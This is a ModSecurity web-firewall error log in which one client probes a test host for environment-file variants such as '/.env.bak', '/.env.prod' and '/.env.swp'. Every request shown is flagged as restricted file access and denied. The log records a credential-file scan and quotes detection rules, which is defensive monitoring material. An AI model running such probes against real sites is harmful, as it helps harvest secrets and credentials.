[Tue Nov 18 14:51:02.784861 2025] [:error] [pid 160901] [client 34.235.129.146:54336] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aRx5xh54imVYfbO8_klVUgAAAAU"]
[Tue Nov 18 14:51:02.784994 2025] [:error] [pid 160901] [client 34.235.129.146:54336] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aRx5xh54imVYfbO8_klVUgAAAAU"]
[Tue Nov 18 14:51:02.806605 2025] [:error] [pid 160877] [client 34.235.129.146:54404] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aRx5xggYjeY2f7-QfdJupwAAAAI"]
[Tue Nov 18 14:51:02.806742 2025] [:error] [pid 160877] [client 34.235.129.146:54404] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aRx5xggYjeY2f7-QfdJupwAAAAI"]
[Tue Nov 18 14:51:02.806873 2025] [:error] [pid 160877] [client 34.235.129.146:54404] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aRx5xggYjeY2f7-QfdJupwAAAAI"]
[Tue Nov 18 14:51:02.807017 2025] [:error] [pid 160877] [client 34.235.129.146:54404] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aRx5xggYjeY2f7-QfdJupwAAAAI"]
[Tue Nov 18 14:51:02.895034 2025] [:error] [pid 153863] [client 34.235.129.146:54420] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aRx5xuo53hvRBsk5IfbhVwAAAAA"]
[Tue Nov 18 14:51:02.895243 2025] [:error] [pid 153863] [client 34.235.129.146:54420] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aRx5xuo53hvRBsk5IfbhVwAAAAA"]
[Tue Nov 18 14:51:02.895419 2025] [:error] [pid 153863] [client 34.235.129.146:54420] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aRx5xuo53hvRBsk5IfbhVwAAAAA"]
[Tue Nov 18 14:51:02.944077 2025] [:error] [pid 166202] [client 34.235.129.146:54430] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aRx5xrjjT4drRne9BbQupwAAAAk"]
[Tue Nov 18 14:51:02.944346 2025] [:error] [pid 166202] [client 34.235.129.146:54430] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aRx5xrjjT4drRne9BbQupwAAAAk"]
[Tue Nov 18 14:51:02.944618 2025] [:error] [pid 166202] [client 34.235.129.146:54430] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aRx5xrjjT4drRne9BbQupwAAAAk"]
[Tue Nov 18 14:51:02.979063 2025] [:error] [pid 160881] [client 34.235.129.146:54424] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aRx5xsKvHpCFfzvQgqZexwAAAAQ"]
[Tue Nov 18 14:51:02.979244 2025] [:error] [pid 160881] [client 34.235.129.146:54424] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aRx5xsKvHpCFfzvQgqZexwAAAAQ"]
[Tue Nov 18 14:51:02.979441 2025] [:error] [pid 160881] [client 34.235.129.146:54424] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aRx5xsKvHpCFfzvQgqZexwAAAAQ"]
[Tue Nov 18 14:51:02.979626 2025] [:error] [pid 160881] [client 34.235.129.146:54424] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aRx5xsKvHpCFfzvQgqZexwAAAAQ"]
[Tue Nov 18 14:51:02.985986 2025] [:error] [pid 160239] [client 34.235.129.146:54446] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env~"] [unique_id "aRx5xu1NcONF8naoxQFe9QAAAAw"]
[Tue Nov 18 14:51:02.986193 2025] [:error] [pid 160239] [client 34.235.129.146:54446] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env~"] [unique_id "aRx5xu1NcONF8naoxQFe9QAAAAw"]
[Tue Nov 18 14:51:02.986364 2025] [:error] [pid 160239] [client 34.235.129.146:54446] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env~"] [unique_id "aRx5xu1NcONF8naoxQFe9QAAAAw"]
[Tue Nov 18 14:51:03.065722 2025] [:error] [pid 154301] [client 34.235.129.146:54478] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRx5x-18X441rUDF_U5eRgAAAAg"]
[Tue Nov 18 14:51:03.065880 2025] [:error] [pid 154301] [client 34.235.129.146:54478] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRx5x-18X441rUDF_U5eRgAAAAg"]
[Tue Nov 18 14:51:03.066079 2025] [:error] [pid 154301] [client 34.235.129.146:54478] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRx5x-18X441rUDF_U5eRgAAAAg"]
[Tue Nov 18 14:51:03.066227 2025] [:error] [pid 154301] [client 34.235.129.146:54478] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRx5x-18X441rUDF_U5eRgAAAAg"]
[Tue Nov 18 14:51:03.087181 2025] [:error] [pid 160906] [client 34.235.129.146:54458] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aRx5x_7FUeIdxVPAs5iguQAAAAY"]
[Tue Nov 18 14:51:03.087379 2025] [:error] [pid 160906] [client 34.235.129.146:54458] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aRx5x_7FUeIdxVPAs5iguQAAAAY"]
[Tue Nov 18 14:51:03.087549 2025] [:error] [pid 160906] [client 34.235.129.146:54458] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aRx5x_7FUeIdxVPAs5iguQAAAAY"]
[Tue Nov 18 14:51:03.101582 2025] [:error] [pid 160237] [client 34.235.129.146:54466] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "aRx5x00XkfZCrdQo7dFhWAAAAAM"]
[Tue Nov 18 14:51:03.101787 2025] [:error] [pid 160237] [client 34.235.129.146:54466] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "aRx5x00XkfZCrdQo7dFhWAAAAAM"]
[Tue Nov 18 14:51:03.101949 2025] [:error] [pid 160237] [client 34.235.129.146:54466] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "aRx5x00XkfZCrdQo7dFhWAAAAAM"]
[Tue Nov 18 14:51:06.331594 2025] [:error] [pid 160901] [client 34.235.129.146:41084] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "aRx5yh54imVYfbO8_klVUwAAAAU"]
[Tue Nov 18 14:51:06.331800 2025] [:error] [pid 160901] [client 34.235.129.146:41084] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "aRx5yh54imVYfbO8_klVUwAAAAU"]
[Tue Nov 18 14:51:06.331970 2025] [:error] [pid 160901] [client 34.235.129.146:41084] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "aRx5yh54imVYfbO8_klVUwAAAAU"]
[Tue Nov 18 14:51:06.346583 2025] [:error] [pid 163656] [client 34.235.129.146:41100] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.swp"] [unique_id "aRx5ysCoCYNOyUBImXwJKwAAAAc"]
[Tue Nov 18 14:51:06.346730 2025] [:error] [pid 163656] [client 34.235.129.146:41100] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.swp"] [unique_id "aRx5ysCoCYNOyUBImXwJKwAAAAc"]
[Tue Nov 18 14:51:06.346912 2025] [:error] [pid 163656] [client 34.235.129.146:41100] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.swp"] [unique_id "aRx5ysCoCYNOyUBImXwJKwAAAAc"]
[Tue Nov 18 14:51:06.347068 2025] [:error] [pid 163656] [client 34.235.129.146:41100] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.swp"] [unique_id "aRx5ysCoCYNOyUBImXwJKwAAAAc"]
[Tue Nov 18 14:51:06.389671 2025] [:error] [pid 153863] [client 34.235.129.146:41114] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "aRx5yuo53hvRBsk5IfbhWAAAAAA"]
